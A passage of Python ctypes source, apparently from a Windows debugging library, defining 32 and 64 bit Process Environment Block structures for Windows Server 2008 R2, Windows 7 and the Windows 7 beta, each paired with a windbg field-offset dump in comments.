        ("AnsiCodePageData", PVOID),
        ("OemCodePageData", PVOID),
        ("UnicodeCaseTableData", PVOID),
        ("NumberOfProcessors", DWORD),
        ("NtGlobalFlag", DWORD),
        ("CriticalSectionTimeout", LONGLONG),  # LARGE_INTEGER
        # The Heap* reservation fields are SIZE_T sized, hence 8 bytes here.
        ("HeapSegmentReserve", QWORD),
        ("HeapSegmentCommit", QWORD),
        ("HeapDeCommitTotalFreeThreshold", QWORD),
        ("HeapDeCommitFreeBlockThreshold", QWORD),
        ("NumberOfHeaps", DWORD),
        ("MaximumNumberOfHeaps", DWORD),
        ("ProcessHeaps", PVOID),  # Ptr64 Ptr64 Void
        ("GdiSharedHandleTable", PVOID),
        ("ProcessStarterHelper", PVOID),
        ("GdiDCAttributeList", DWORD),
        ("LoaderLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("OSMajorVersion", DWORD),
        ("OSMinorVersion", DWORD),
        ("OSBuildNumber", WORD),
        ("OSCSDVersion", WORD),
        ("OSPlatformId", DWORD),
        ("ImageSubsystem", DWORD),
        ("ImageSubsystemMajorVersion", DWORD),
        ("ImageSubsystemMinorVersion", DWORD),
        ("ActiveProcessAffinityMask", QWORD),
        ("GdiHandleBuffer", DWORD * 60),  # [60] on Win64 vs [34] on Win32
        ("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
        ("TlsExpansionBitmap", PVOID),
        ("TlsExpansionBitmapBits", DWORD * 32),
        ("SessionId", DWORD),
        ("AppCompatFlags", ULONGLONG),  # ULARGE_INTEGER
        ("AppCompatFlagsUser", ULONGLONG),  # ULARGE_INTEGER
        ("pShimData", PVOID),
        ("AppCompatInfo", PVOID),
        ("CSDVersion", UNICODE_STRING),
        ("ActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("ProcessAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        ("SystemDefaultActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("SystemAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        ("MinimumStackCommit", QWORD),
        ("FlsCallback", PVOID),  # PFLS_CALLBACK_INFO
        ("FlsListHead", LIST_ENTRY),
        ("FlsBitmap", PVOID),
        ("FlsBitmapBits", DWORD * 4),
        ("FlsHighIndex", DWORD),
        ("WerRegistrationData", PVOID),
        ("WerShipAssertPtr", PVOID),
    ]

    # KernelCallbackTable and UserSharedInfoPtr overlap at the same offset
    # in the real PEB (both +0x058 in the dump above); this property
    # emulates that union by aliasing the KernelCallbackTable field.
    def __get_UserSharedInfoPtr(self):
        return self.KernelCallbackTable
    def __set_UserSharedInfoPtr(self, value):
        self.KernelCallbackTable = value
    UserSharedInfoPtr = property(__get_UserSharedInfoPtr, __set_UserSharedInfoPtr)
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 IsProtectedProcess : Pos 1, 1 Bit
# +0x003 IsLegacyProcess : Pos 2, 1 Bit
# +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
# +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
# +0x003 SpareBits : Pos 5, 3 Bits
# +0x004 Mutant : Ptr32 Void
# +0x008 ImageBaseAddress : Ptr32 Void
# +0x00c Ldr : Ptr32 _PEB_LDR_DATA
# +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
# +0x014 SubSystemData : Ptr32 Void
# +0x018 ProcessHeap : Ptr32 Void
# +0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x020 AtlThunkSListPtr : Ptr32 Void
# +0x024 IFEOKey : Ptr32 Void
# +0x028 CrossProcessFlags : Uint4B
# +0x028 ProcessInJob : Pos 0, 1 Bit
# +0x028 ProcessInitializing : Pos 1, 1 Bit
# +0x028 ProcessUsingVEH : Pos 2, 1 Bit
# +0x028 ProcessUsingVCH : Pos 3, 1 Bit
# +0x028 ProcessUsingFTH : Pos 4, 1 Bit
# +0x028 ReservedBits0 : Pos 5, 27 Bits
# +0x02c KernelCallbackTable : Ptr32 Void
# +0x02c UserSharedInfoPtr : Ptr32 Void
# +0x030 SystemReserved : [1] Uint4B
# +0x034 AtlThunkSListPtr32 : Uint4B
# +0x038 ApiSetMap : Ptr32 Void
# +0x03c TlsExpansionCounter : Uint4B
# +0x040 TlsBitmap : Ptr32 Void
# +0x044 TlsBitmapBits : [2] Uint4B
# +0x04c ReadOnlySharedMemoryBase : Ptr32 Void
# +0x050 HotpatchInformation : Ptr32 Void
# +0x054 ReadOnlyStaticServerData : Ptr32 Ptr32 Void
# +0x058 AnsiCodePageData : Ptr32 Void
# +0x05c OemCodePageData : Ptr32 Void
# +0x060 UnicodeCaseTableData : Ptr32 Void
# +0x064 NumberOfProcessors : Uint4B
# +0x068 NtGlobalFlag : Uint4B
# +0x070 CriticalSectionTimeout : _LARGE_INTEGER
# +0x078 HeapSegmentReserve : Uint4B
# +0x07c HeapSegmentCommit : Uint4B
# +0x080 HeapDeCommitTotalFreeThreshold : Uint4B
# +0x084 HeapDeCommitFreeBlockThreshold : Uint4B
# +0x088 NumberOfHeaps : Uint4B
# +0x08c MaximumNumberOfHeaps : Uint4B
# +0x090 ProcessHeaps : Ptr32 Ptr32 Void
# +0x094 GdiSharedHandleTable : Ptr32 Void
# +0x098 ProcessStarterHelper : Ptr32 Void
# +0x09c GdiDCAttributeList : Uint4B
# +0x0a0 LoaderLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x0a4 OSMajorVersion : Uint4B
# +0x0a8 OSMinorVersion : Uint4B
# +0x0ac OSBuildNumber : Uint2B
# +0x0ae OSCSDVersion : Uint2B
# +0x0b0 OSPlatformId : Uint4B
# +0x0b4 ImageSubsystem : Uint4B
# +0x0b8 ImageSubsystemMajorVersion : Uint4B
# +0x0bc ImageSubsystemMinorVersion : Uint4B
# +0x0c0 ActiveProcessAffinityMask : Uint4B
# +0x0c4 GdiHandleBuffer : [34] Uint4B
# +0x14c PostProcessInitRoutine : Ptr32 void
# +0x150 TlsExpansionBitmap : Ptr32 Void
# +0x154 TlsExpansionBitmapBits : [32] Uint4B
# +0x1d4 SessionId : Uint4B
# +0x1d8 AppCompatFlags : _ULARGE_INTEGER
# +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x1e8 pShimData : Ptr32 Void
# +0x1ec AppCompatInfo : Ptr32 Void
# +0x1f0 CSDVersion : _UNICODE_STRING
# +0x1f8 ActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x1fc ProcessAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x200 SystemDefaultActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x204 SystemAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x208 MinimumStackCommit : Uint4B
# +0x20c FlsCallback : Ptr32 _FLS_CALLBACK_INFO
# +0x210 FlsListHead : _LIST_ENTRY
# +0x218 FlsBitmap : Ptr32 Void
# +0x21c FlsBitmapBits : [4] Uint4B
# +0x22c FlsHighIndex : Uint4B
# +0x230 WerRegistrationData : Ptr32 Void
# +0x234 WerShipAssertPtr : Ptr32 Void
# +0x238 pContextData : Ptr32 Void
# +0x23c pImageHeaderHash : Ptr32 Void
# +0x240 TracingFlags : Uint4B
# +0x240 HeapTracingEnabled : Pos 0, 1 Bit
# +0x240 CritSecTracingEnabled : Pos 1, 1 Bit
# +0x240 SpareTracingBits : Pos 2, 30 Bits
class _PEB_2008_R2(Structure):
    """
    PEB structure for 32 bit Windows Server 2008 R2 (same layout as
    Windows 7, see L{_PEB_W7}).

    The field layout follows the windbg type dump reproduced in the
    comment block directly above this class.
    """
    _pack_ = 8
    _fields_ = [
        ("InheritedAddressSpace", BOOLEAN),
        ("ReadImageFileExecOptions", UCHAR),
        ("BeingDebugged", BOOLEAN),
        ("BitField", UCHAR),
        ("Mutant", HANDLE),
        ("ImageBaseAddress", PVOID),
        ("Ldr", PVOID),  # PPEB_LDR_DATA
        ("ProcessParameters", PVOID),  # PRTL_USER_PROCESS_PARAMETERS
        ("SubSystemData", PVOID),
        ("ProcessHeap", PVOID),
        ("FastPebLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("AtlThunkSListPtr", PVOID),
        ("IFEOKey", PVOID),
        ("CrossProcessFlags", DWORD),
        ("KernelCallbackTable", PVOID),  # also UserSharedInfoPtr (union, see below)
        ("SystemReserved", DWORD),
        # Fixed: was PVOID. The windbg dump above documents this field as
        # Uint4B at +0x034: it always holds a 32 bit pointer value, even in
        # the 64 bit PEB (see _PEB_2008_R2_64, which declares it as DWORD).
        # On a 32 bit build the layout is unchanged by this fix.
        ("AtlThunkSListPtr32", DWORD),
        ("ApiSetMap", PVOID),
        ("TlsExpansionCounter", DWORD),
        ("TlsBitmap", PVOID),
        ("TlsBitmapBits", DWORD * 2),
        ("ReadOnlySharedMemoryBase", PVOID),
        ("HotpatchInformation", PVOID),
        ("ReadOnlyStaticServerData", PVOID),  # Ptr32 Ptr32 Void
        ("AnsiCodePageData", PVOID),
        ("OemCodePageData", PVOID),
        ("UnicodeCaseTableData", PVOID),
        ("NumberOfProcessors", DWORD),
        ("NtGlobalFlag", DWORD),
        ("CriticalSectionTimeout", LONGLONG),  # LARGE_INTEGER
        ("HeapSegmentReserve", DWORD),
        ("HeapSegmentCommit", DWORD),
        ("HeapDeCommitTotalFreeThreshold", DWORD),
        ("HeapDeCommitFreeBlockThreshold", DWORD),
        ("NumberOfHeaps", DWORD),
        ("MaximumNumberOfHeaps", DWORD),
        ("ProcessHeaps", PVOID),  # Ptr32 Ptr32 Void
        ("GdiSharedHandleTable", PVOID),
        ("ProcessStarterHelper", PVOID),
        ("GdiDCAttributeList", DWORD),
        ("LoaderLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("OSMajorVersion", DWORD),
        ("OSMinorVersion", DWORD),
        ("OSBuildNumber", WORD),
        ("OSCSDVersion", WORD),
        ("OSPlatformId", DWORD),
        ("ImageSubsystem", DWORD),
        ("ImageSubsystemMajorVersion", DWORD),
        ("ImageSubsystemMinorVersion", DWORD),
        ("ActiveProcessAffinityMask", DWORD),
        ("GdiHandleBuffer", DWORD * 34),
        ("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
        ("TlsExpansionBitmap", PVOID),
        ("TlsExpansionBitmapBits", DWORD * 32),
        ("SessionId", DWORD),
        ("AppCompatFlags", ULONGLONG),  # ULARGE_INTEGER
        ("AppCompatFlagsUser", ULONGLONG),  # ULARGE_INTEGER
        ("pShimData", PVOID),
        ("AppCompatInfo", PVOID),
        ("CSDVersion", UNICODE_STRING),
        ("ActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("ProcessAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        ("SystemDefaultActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("SystemAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        ("MinimumStackCommit", DWORD),
        ("FlsCallback", PVOID),  # PFLS_CALLBACK_INFO
        ("FlsListHead", LIST_ENTRY),
        ("FlsBitmap", PVOID),
        ("FlsBitmapBits", DWORD * 4),
        ("FlsHighIndex", DWORD),
        ("WerRegistrationData", PVOID),
        ("WerShipAssertPtr", PVOID),
        ("pContextData", PVOID),
        ("pImageHeaderHash", PVOID),
        ("TracingFlags", DWORD),
    ]

    # KernelCallbackTable and UserSharedInfoPtr overlap at the same offset
    # in the real PEB (both +0x02c in the dump above); this property
    # emulates that union by aliasing the KernelCallbackTable field.
    def __get_UserSharedInfoPtr(self):
        return self.KernelCallbackTable
    def __set_UserSharedInfoPtr(self, value):
        self.KernelCallbackTable = value
    UserSharedInfoPtr = property(__get_UserSharedInfoPtr, __set_UserSharedInfoPtr)
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 IsProtectedProcess : Pos 1, 1 Bit
# +0x003 IsLegacyProcess : Pos 2, 1 Bit
# +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
# +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
# +0x003 SpareBits : Pos 5, 3 Bits
# +0x008 Mutant : Ptr64 Void
# +0x010 ImageBaseAddress : Ptr64 Void
# +0x018 Ldr : Ptr64 _PEB_LDR_DATA
# +0x020 ProcessParameters : Ptr64 _RTL_USER_PROCESS_PARAMETERS
# +0x028 SubSystemData : Ptr64 Void
# +0x030 ProcessHeap : Ptr64 Void
# +0x038 FastPebLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x040 AtlThunkSListPtr : Ptr64 Void
# +0x048 IFEOKey : Ptr64 Void
# +0x050 CrossProcessFlags : Uint4B
# +0x050 ProcessInJob : Pos 0, 1 Bit
# +0x050 ProcessInitializing : Pos 1, 1 Bit
# +0x050 ProcessUsingVEH : Pos 2, 1 Bit
# +0x050 ProcessUsingVCH : Pos 3, 1 Bit
# +0x050 ProcessUsingFTH : Pos 4, 1 Bit
# +0x050 ReservedBits0 : Pos 5, 27 Bits
# +0x058 KernelCallbackTable : Ptr64 Void
# +0x058 UserSharedInfoPtr : Ptr64 Void
# +0x060 SystemReserved : [1] Uint4B
# +0x064 AtlThunkSListPtr32 : Uint4B
# +0x068 ApiSetMap : Ptr64 Void
# +0x070 TlsExpansionCounter : Uint4B
# +0x078 TlsBitmap : Ptr64 Void
# +0x080 TlsBitmapBits : [2] Uint4B
# +0x088 ReadOnlySharedMemoryBase : Ptr64 Void
# +0x090 HotpatchInformation : Ptr64 Void
# +0x098 ReadOnlyStaticServerData : Ptr64 Ptr64 Void
# +0x0a0 AnsiCodePageData : Ptr64 Void
# +0x0a8 OemCodePageData : Ptr64 Void
# +0x0b0 UnicodeCaseTableData : Ptr64 Void
# +0x0b8 NumberOfProcessors : Uint4B
# +0x0bc NtGlobalFlag : Uint4B
# +0x0c0 CriticalSectionTimeout : _LARGE_INTEGER
# +0x0c8 HeapSegmentReserve : Uint8B
# +0x0d0 HeapSegmentCommit : Uint8B
# +0x0d8 HeapDeCommitTotalFreeThreshold : Uint8B
# +0x0e0 HeapDeCommitFreeBlockThreshold : Uint8B
# +0x0e8 NumberOfHeaps : Uint4B
# +0x0ec MaximumNumberOfHeaps : Uint4B
# +0x0f0 ProcessHeaps : Ptr64 Ptr64 Void
# +0x0f8 GdiSharedHandleTable : Ptr64 Void
# +0x100 ProcessStarterHelper : Ptr64 Void
# +0x108 GdiDCAttributeList : Uint4B
# +0x110 LoaderLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x118 OSMajorVersion : Uint4B
# +0x11c OSMinorVersion : Uint4B
# +0x120 OSBuildNumber : Uint2B
# +0x122 OSCSDVersion : Uint2B
# +0x124 OSPlatformId : Uint4B
# +0x128 ImageSubsystem : Uint4B
# +0x12c ImageSubsystemMajorVersion : Uint4B
# +0x130 ImageSubsystemMinorVersion : Uint4B
# +0x138 ActiveProcessAffinityMask : Uint8B
# +0x140 GdiHandleBuffer : [60] Uint4B
# +0x230 PostProcessInitRoutine : Ptr64 void
# +0x238 TlsExpansionBitmap : Ptr64 Void
# +0x240 TlsExpansionBitmapBits : [32] Uint4B
# +0x2c0 SessionId : Uint4B
# +0x2c8 AppCompatFlags : _ULARGE_INTEGER
# +0x2d0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x2d8 pShimData : Ptr64 Void
# +0x2e0 AppCompatInfo : Ptr64 Void
# +0x2e8 CSDVersion : _UNICODE_STRING
# +0x2f8 ActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x300 ProcessAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x308 SystemDefaultActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x310 SystemAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x318 MinimumStackCommit : Uint8B
# +0x320 FlsCallback : Ptr64 _FLS_CALLBACK_INFO
# +0x328 FlsListHead : _LIST_ENTRY
# +0x338 FlsBitmap : Ptr64 Void
# +0x340 FlsBitmapBits : [4] Uint4B
# +0x350 FlsHighIndex : Uint4B
# +0x358 WerRegistrationData : Ptr64 Void
# +0x360 WerShipAssertPtr : Ptr64 Void
# +0x368 pContextData : Ptr64 Void
# +0x370 pImageHeaderHash : Ptr64 Void
# +0x378 TracingFlags : Uint4B
# +0x378 HeapTracingEnabled : Pos 0, 1 Bit
# +0x378 CritSecTracingEnabled : Pos 1, 1 Bit
# +0x378 SpareTracingBits : Pos 2, 30 Bits
class _PEB_2008_R2_64(Structure):
    """
    PEB structure for 64 bit Windows Server 2008 R2 (same layout as
    Windows 7, see L{_PEB_W7_64}).

    The field layout follows the windbg type dump reproduced in the
    comment block directly above this class.
    """
    _pack_ = 8
    _fields_ = [
        ("InheritedAddressSpace", BOOLEAN),
        ("ReadImageFileExecOptions", UCHAR),
        ("BeingDebugged", BOOLEAN),
        ("BitField", UCHAR),
        ("Mutant", HANDLE),
        ("ImageBaseAddress", PVOID),
        ("Ldr", PVOID),  # PPEB_LDR_DATA
        ("ProcessParameters", PVOID),  # PRTL_USER_PROCESS_PARAMETERS
        ("SubSystemData", PVOID),
        ("ProcessHeap", PVOID),
        ("FastPebLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("AtlThunkSListPtr", PVOID),
        ("IFEOKey", PVOID),
        ("CrossProcessFlags", DWORD),
        ("KernelCallbackTable", PVOID),  # also UserSharedInfoPtr (union, see below)
        ("SystemReserved", DWORD),
        ("AtlThunkSListPtr32", DWORD),  # always a 32 bit pointer value, even on Win64
        ("ApiSetMap", PVOID),
        ("TlsExpansionCounter", DWORD),
        ("TlsBitmap", PVOID),
        ("TlsBitmapBits", DWORD * 2),
        ("ReadOnlySharedMemoryBase", PVOID),
        ("HotpatchInformation", PVOID),
        ("ReadOnlyStaticServerData", PVOID),  # Ptr64 Ptr64 Void
        ("AnsiCodePageData", PVOID),
        ("OemCodePageData", PVOID),
        ("UnicodeCaseTableData", PVOID),
        ("NumberOfProcessors", DWORD),
        ("NtGlobalFlag", DWORD),
        ("CriticalSectionTimeout", LONGLONG),  # LARGE_INTEGER
        # The Heap* reservation fields are SIZE_T sized, hence 8 bytes here.
        ("HeapSegmentReserve", QWORD),
        ("HeapSegmentCommit", QWORD),
        ("HeapDeCommitTotalFreeThreshold", QWORD),
        ("HeapDeCommitFreeBlockThreshold", QWORD),
        ("NumberOfHeaps", DWORD),
        ("MaximumNumberOfHeaps", DWORD),
        ("ProcessHeaps", PVOID),  # Ptr64 Ptr64 Void
        ("GdiSharedHandleTable", PVOID),
        ("ProcessStarterHelper", PVOID),
        ("GdiDCAttributeList", DWORD),
        ("LoaderLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("OSMajorVersion", DWORD),
        ("OSMinorVersion", DWORD),
        ("OSBuildNumber", WORD),
        ("OSCSDVersion", WORD),
        ("OSPlatformId", DWORD),
        ("ImageSubsystem", DWORD),
        ("ImageSubsystemMajorVersion", DWORD),
        ("ImageSubsystemMinorVersion", DWORD),
        ("ActiveProcessAffinityMask", QWORD),
        ("GdiHandleBuffer", DWORD * 60),  # [60] on Win64 vs [34] on Win32
        ("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
        ("TlsExpansionBitmap", PVOID),
        ("TlsExpansionBitmapBits", DWORD * 32),
        ("SessionId", DWORD),
        ("AppCompatFlags", ULONGLONG),  # ULARGE_INTEGER
        ("AppCompatFlagsUser", ULONGLONG),  # ULARGE_INTEGER
        ("pShimData", PVOID),
        ("AppCompatInfo", PVOID),
        ("CSDVersion", UNICODE_STRING),
        ("ActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("ProcessAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        ("SystemDefaultActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("SystemAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        ("MinimumStackCommit", QWORD),
        ("FlsCallback", PVOID),  # PFLS_CALLBACK_INFO
        ("FlsListHead", LIST_ENTRY),
        ("FlsBitmap", PVOID),
        ("FlsBitmapBits", DWORD * 4),
        ("FlsHighIndex", DWORD),
        ("WerRegistrationData", PVOID),
        ("WerShipAssertPtr", PVOID),
        ("pContextData", PVOID),
        ("pImageHeaderHash", PVOID),
        ("TracingFlags", DWORD),
    ]

    # KernelCallbackTable and UserSharedInfoPtr overlap at the same offset
    # in the real PEB (both +0x058 in the dump above); this property
    # emulates that union by aliasing the KernelCallbackTable field.
    def __get_UserSharedInfoPtr(self):
        return self.KernelCallbackTable
    def __set_UserSharedInfoPtr(self, value):
        self.KernelCallbackTable = value
    UserSharedInfoPtr = property(__get_UserSharedInfoPtr, __set_UserSharedInfoPtr)
# Windows Vista reuses the Server 2008 PEB definitions, and Windows 7
# reuses the Server 2008 R2 definitions, in both bitnesses.
_PEB_Vista = _PEB_2008
_PEB_Vista_64 = _PEB_2008_64
_PEB_W7 = _PEB_2008_R2
_PEB_W7_64 = _PEB_2008_R2_64
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 IsProtectedProcess : Pos 1, 1 Bit
# +0x003 IsLegacyProcess : Pos 2, 1 Bit
# +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
# +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
# +0x003 SpareBits : Pos 5, 3 Bits
# +0x004 Mutant : Ptr32 Void
# +0x008 ImageBaseAddress : Ptr32 Void
# +0x00c Ldr : Ptr32 _PEB_LDR_DATA
# +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
# +0x014 SubSystemData : Ptr32 Void
# +0x018 ProcessHeap : Ptr32 Void
# +0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x020 AtlThunkSListPtr : Ptr32 Void
# +0x024 IFEOKey : Ptr32 Void
# +0x028 CrossProcessFlags : Uint4B
# +0x028 ProcessInJob : Pos 0, 1 Bit
# +0x028 ProcessInitializing : Pos 1, 1 Bit
# +0x028 ProcessUsingVEH : Pos 2, 1 Bit
# +0x028 ProcessUsingVCH : Pos 3, 1 Bit
# +0x028 ProcessUsingFTH : Pos 4, 1 Bit
# +0x028 ReservedBits0 : Pos 5, 27 Bits
# +0x02c KernelCallbackTable : Ptr32 Void
# +0x02c UserSharedInfoPtr : Ptr32 Void
# +0x030 SystemReserved : [1] Uint4B
# +0x034 TracingFlags : Uint4B
# +0x034 HeapTracingEnabled : Pos 0, 1 Bit
# +0x034 CritSecTracingEnabled : Pos 1, 1 Bit
# +0x034 SpareTracingBits : Pos 2, 30 Bits
# +0x038 ApiSetMap : Ptr32 Void
# +0x03c TlsExpansionCounter : Uint4B
# +0x040 TlsBitmap : Ptr32 Void
# +0x044 TlsBitmapBits : [2] Uint4B
# +0x04c ReadOnlySharedMemoryBase : Ptr32 Void
# +0x050 HotpatchInformation : Ptr32 Void
# +0x054 ReadOnlyStaticServerData : Ptr32 Ptr32 Void
# +0x058 AnsiCodePageData : Ptr32 Void
# +0x05c OemCodePageData : Ptr32 Void
# +0x060 UnicodeCaseTableData : Ptr32 Void
# +0x064 NumberOfProcessors : Uint4B
# +0x068 NtGlobalFlag : Uint4B
# +0x070 CriticalSectionTimeout : _LARGE_INTEGER
# +0x078 HeapSegmentReserve : Uint4B
# +0x07c HeapSegmentCommit : Uint4B
# +0x080 HeapDeCommitTotalFreeThreshold : Uint4B
# +0x084 HeapDeCommitFreeBlockThreshold : Uint4B
# +0x088 NumberOfHeaps : Uint4B
# +0x08c MaximumNumberOfHeaps : Uint4B
# +0x090 ProcessHeaps : Ptr32 Ptr32 Void
# +0x094 GdiSharedHandleTable : Ptr32 Void
# +0x098 ProcessStarterHelper : Ptr32 Void
# +0x09c GdiDCAttributeList : Uint4B
# +0x0a0 LoaderLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x0a4 OSMajorVersion : Uint4B
# +0x0a8 OSMinorVersion : Uint4B
# +0x0ac OSBuildNumber : Uint2B
# +0x0ae OSCSDVersion : Uint2B
# +0x0b0 OSPlatformId : Uint4B
# +0x0b4 ImageSubsystem : Uint4B
# +0x0b8 ImageSubsystemMajorVersion : Uint4B
# +0x0bc ImageSubsystemMinorVersion : Uint4B
# +0x0c0 ActiveProcessAffinityMask : Uint4B
# +0x0c4 GdiHandleBuffer : [34] Uint4B
# +0x14c PostProcessInitRoutine : Ptr32 void
# +0x150 TlsExpansionBitmap : Ptr32 Void
# +0x154 TlsExpansionBitmapBits : [32] Uint4B
# +0x1d4 SessionId : Uint4B
# +0x1d8 AppCompatFlags : _ULARGE_INTEGER
# +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x1e8 pShimData : Ptr32 Void
# +0x1ec AppCompatInfo : Ptr32 Void
# +0x1f0 CSDVersion : _UNICODE_STRING
# +0x1f8 ActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x1fc ProcessAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x200 SystemDefaultActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x204 SystemAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x208 MinimumStackCommit : Uint4B
# +0x20c FlsCallback : Ptr32 _FLS_CALLBACK_INFO
# +0x210 FlsListHead : _LIST_ENTRY
# +0x218 FlsBitmap : Ptr32 Void
# +0x21c FlsBitmapBits : [4] Uint4B
# +0x22c FlsHighIndex : Uint4B
# +0x230 WerRegistrationData : Ptr32 Void
# +0x234 WerShipAssertPtr : Ptr32 Void
# +0x238 pContextData : Ptr32 Void
# +0x23c pImageHeaderHash : Ptr32 Void
class _PEB_W7_Beta(Structure):
    """
    This definition of the PEB structure is only valid for the beta versions
    of Windows 7. For the final version of Windows 7 use L{_PEB_W7} instead.
    This structure is not chosen automatically.

    The field order and types define the in-memory layout (see the windbg
    dump in the comments above); do not reorder or retype fields.
    """
    _pack_ = 8
    _fields_ = [
        ("InheritedAddressSpace", BOOLEAN),
        ("ReadImageFileExecOptions", UCHAR),
        ("BeingDebugged", BOOLEAN),
        ("BitField", UCHAR),
        ("Mutant", HANDLE),
        ("ImageBaseAddress", PVOID),
        ("Ldr", PVOID),  # PPEB_LDR_DATA
        ("ProcessParameters", PVOID),  # PRTL_USER_PROCESS_PARAMETERS
        ("SubSystemData", PVOID),
        ("ProcessHeap", PVOID),
        ("FastPebLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("AtlThunkSListPtr", PVOID),
        ("IFEOKey", PVOID),
        ("CrossProcessFlags", DWORD),
        ("KernelCallbackTable", PVOID),
        ("SystemReserved", DWORD),
        ("TracingFlags", DWORD),
        ("ApiSetMap", PVOID),
        ("TlsExpansionCounter", DWORD),
        ("TlsBitmap", PVOID),
        ("TlsBitmapBits", DWORD * 2),
        ("ReadOnlySharedMemoryBase", PVOID),
        ("HotpatchInformation", PVOID),
        ("ReadOnlyStaticServerData", PVOID),  # Ptr32 Ptr32 Void
        ("AnsiCodePageData", PVOID),
        ("OemCodePageData", PVOID),
        ("UnicodeCaseTableData", PVOID),
        ("NumberOfProcessors", DWORD),
        ("NtGlobalFlag", DWORD),
        ("CriticalSectionTimeout", LONGLONG),  # LARGE_INTEGER
        ("HeapSegmentReserve", DWORD),
        ("HeapSegmentCommit", DWORD),
        ("HeapDeCommitTotalFreeThreshold", DWORD),
        ("HeapDeCommitFreeBlockThreshold", DWORD),
        ("NumberOfHeaps", DWORD),
        ("MaximumNumberOfHeaps", DWORD),
        ("ProcessHeaps", PVOID),  # Ptr32 Ptr32 Void
        ("GdiSharedHandleTable", PVOID),
        ("ProcessStarterHelper", PVOID),
        ("GdiDCAttributeList", DWORD),
        ("LoaderLock", PVOID),  # PRTL_CRITICAL_SECTION
        ("OSMajorVersion", DWORD),
        ("OSMinorVersion", DWORD),
        ("OSBuildNumber", WORD),
        ("OSCSDVersion", WORD),
        ("OSPlatformId", DWORD),
        ("ImageSubsystem", DWORD),
        ("ImageSubsystemMajorVersion", DWORD),
        ("ImageSubsystemMinorVersion", DWORD),
        ("ActiveProcessAffinityMask", DWORD),
        ("GdiHandleBuffer", DWORD * 34),
        ("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
        ("TlsExpansionBitmap", PVOID),
        ("TlsExpansionBitmapBits", DWORD * 32),
        ("SessionId", DWORD),
        ("AppCompatFlags", ULONGLONG),  # ULARGE_INTEGER
        ("AppCompatFlagsUser", ULONGLONG),  # ULARGE_INTEGER
        ("pShimData", PVOID),
        ("AppCompatInfo", PVOID),
        ("CSDVersion", UNICODE_STRING),
        ("ActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("ProcessAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        ("SystemDefaultActivationContextData", PVOID),  # ACTIVATION_CONTEXT_DATA
        ("SystemAssemblyStorageMap", PVOID),  # ASSEMBLY_STORAGE_MAP
        ("MinimumStackCommit", DWORD),
        ("FlsCallback", PVOID),  # PFLS_CALLBACK_INFO
        ("FlsListHead", LIST_ENTRY),
        ("FlsBitmap", PVOID),
        ("FlsBitmapBits", DWORD * 4),
